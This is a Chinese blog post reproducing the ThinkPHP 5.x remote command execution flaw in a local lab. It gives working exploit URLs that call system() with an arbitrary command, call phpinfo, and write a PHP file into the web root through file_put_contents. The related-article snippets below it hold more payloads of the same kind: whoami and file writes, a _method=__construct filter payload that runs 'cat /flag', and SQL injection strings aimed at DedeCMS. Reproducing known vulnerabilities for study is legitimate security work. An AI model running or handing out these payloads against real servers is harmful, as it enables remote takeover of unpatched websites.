thinkphp5.*远程命令执行漏洞复现

最新推荐文章于 2024-08-14 22:33:34 发布

小菜茑

最新推荐文章于 2024-08-14 22:33:34 发布

阅读量638

点赞数

分类专栏：漏洞复现文章标签：安全渗透测试

本文链接：https://blog.csdn.net/weixin_42075643/article/details/113253912

版权

漏洞复现专栏收录该内容

2 篇文章 0 订阅

订阅专栏

ThinkPHP5漏洞复现：
环境搭建成功后的界面
测试版本：ThinkPHP_full_v5.0.22
远程执行命令漏洞：
首先工具检测漏洞是否存在：
检测工具
远程执行命令，wireshark抓包：
wireshark抓包界面
直接得到poc：

http://127.0.0.1/tp5/public/index.php/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令]

用BP验证：
burpsuite界面
获取PHP信息的poc：http://127.0.0.1/tp5/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
用BP验证：
BP验证结果
然后，写入phpinfo：

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E

访问http://127.0.0.1/tp5/public/info.php

显示PHP信息即成功！

《小白初练》

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

小菜茑

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

php命令执行漏洞利用,ThinkPHP 5.0 & 5.1远程命令执行漏洞利用分析

weixin_31308407的博客

03-21

883

0x01 漏洞利用方式5.0版本POC(不唯一)命令执行：?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[系统命令]文件写入：?s=index/\think\app/invokefunction&function=call_user_...

ThinkPHP 2.x 任意代码执行漏洞复现

zeroc009的博客

02-14

379

ThinkPHP 2.x 任意代码执行漏洞复现漏洞简述影响范围复现过程漏洞简述 ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由： KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at position 7: depr.'\̲

参与评论您还未登录，请先登录后发表或查看评论

thinkphp 5.x全版本任意代码执行

yuanfengfengyuan的博客

06-05

876

MSG ThinkPHP 5.x 版本中没有对路由中的控制器进行严格过滤，在存在admin、index模块、没有开启强制路由的条件下（默认不开启），导致可以注入恶意代码利用反射类调用命名空间其他任意内置类，从而被 GetShell。 POC 反斜杠解析成类造成命令执行 thinkphp 5.0.22 1、http://192.168.1.1/thinkphp/public/?s=.|think\...

ThinkPHP5漏洞分析之代码执行

最新发布

duoba_an的博客

08-14

959

本次漏洞存在于的缓存类中。该类会将缓存数据通过序列化的方式，直接存储在文件中，攻击者通过精心构造的，即可将写入缓存文件。缓存文件的名字和目录均可预测出来，一旦缓存目录可访问或结合任意文件包含漏洞，即可触发。漏洞影响版本：。

thinkphp5.0.23命令执行-靶场复现

m0_66376444的博客

04-19

1081

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。在大于5.0.21小于等于5.0.23的情况下，由于修改了method函数的逻辑，无法随意用变量，这里统一用只能用get[],route[]。命令执行成功，可以看出是windows，所以我用nc来拿shell。本次测试版本：thinkphp5.0.23。三、thinkphp总述。

命令执行漏洞

一个普普通通的博客

04-18

573

命令执行

Thinkphp 5.x远程命令执行漏洞

白泽Sec安全实验室

11-07

1666

漏洞描述 ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，推荐尽快更新到最新版本。 thinkphp5最出名的就是rce，rce有两个大版本的分别： ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 因为漏洞触发点和版本的不同，导致payload分为多种，其中一些payload需要取决于debug选项比如直

thinkphp5调用shell脚本_ThinkPHP 5.x远程命令执行漏洞复现

weixin_34566429的博客

12-23

565

一、漏洞描述2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞:漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。二、漏洞影响版本Thinkphp 5.x-Thinkphp 5.1.31Thinkphp 5.0.x<=5.0.23三、漏洞复...

thinkphp5调用shell脚本_【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)

weixin_39906358的博客

01-16

345

0x00复现环境0x01步骤0x02漏洞原理分析关键代码在修复之前程序未对控制器进行过滤，导致攻击者可以通过引入 \ 符号来调用任意类方法。$this -> app -> controller 方法来实例化控制器，然后调用实例中的方法。follow the controller method：thinkphp/library/think/App.php通过parseModuleAn...

thinkphp5远程代码执行漏洞分析(一)

weixin_30482383的博客

08-28

637

payload 测试版本thinkphp5.1beta url =>http://127.0.0.1/thinkphp5.1beta/public/index.php?s=index/\think\Container/invokefunction&function=call_user_func&vars[0]=phpinfo&vars[1]=1 漏洞...

复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

weixin_56513549的博客

02-21

2763

执行whoami /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1...

攻防世界web练习15

H_S2022的博客

07-13

427

攻防世界web练习

织梦用的是php还是thinkphp,常见的程序漏洞渗透语句ThinkPHP/织梦(dede)/WordPress等......

weixin_39872123的博客

03-18

1825

都是渗透我博客防火墙里看到的...我只知道大概的渗透语句,和渗透什么程序的.具体好不好使怎么用我就不知道了...#织梦/digg/digg_add.php?id＝1&con＝2&digg_mod＝digg_data%20WHERE%201＝2%20+and(select%201%20from(select%20count(*),concat((select%20(select%20...

ThinkPHP5RCE漏洞复现

飞雪 SecurityBlog

06-16

312

Payload：/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

php _get漏洞,thinkphp代码执行getshell的漏洞解决

weixin_35797900的博客

03-18

632

先来简单说说前天thinkphp官方修复的一个getshell漏洞，框架对控制器没有进行足够的检测导致的一处getshell影响的范围:5.x < 5.1.31, <= 5.0.23漏洞危害: 导致系统被提权(你懂的)先来讲下,5.0 跟5.1的区别吧，tp5.1中引入了容器(Container)和门面(Facade)这两个新的类 tp5.0是没有这两个新的类的，漏洞原理URL：ht...

Thinkphp5 5.0.22/5.1.29远程代码执行漏洞复现

weixin_52347768的博客

03-28

4609

远程代码执行漏洞作用：攻击者向后台服务器远程注入操作系统命令或者代码，进而控制后台系统远程代码执行漏洞的原理：由于部分应用系统从设计上需要给用户提供指定的远程命令操作的接口，如果没有做严格的安全控制，可能会导致攻击者通过该接口提交恶意的命令，从而让后台进行执行，从而控制整个后台服务器。由于需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。启动环境，访问http://159.75.16.25:8087,看到启动界面进行复现，poc： /i

thinkphp5漏洞几道例题

wo41ge的博客

11-14

245

漏洞具体看这里 ThinkPHP5.0.23(远程命令执行) 例题[BJDCTF 2nd]old-hack index.php?s=1查看版本 POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag ThinkPHP V5.0.20(远程

ThinkPHP5.0.* Request类远程代码执行漏洞分析

"这篇文档主要讨论的是ThinkPHP框架中的一个安全漏洞，具体是关于request函数的远程代码执行问题，涉及到的文件是library/think/Request.php的541至603行。此问题影响ThinkPHP 5.0.*版本。攻击者可以利用这个漏洞...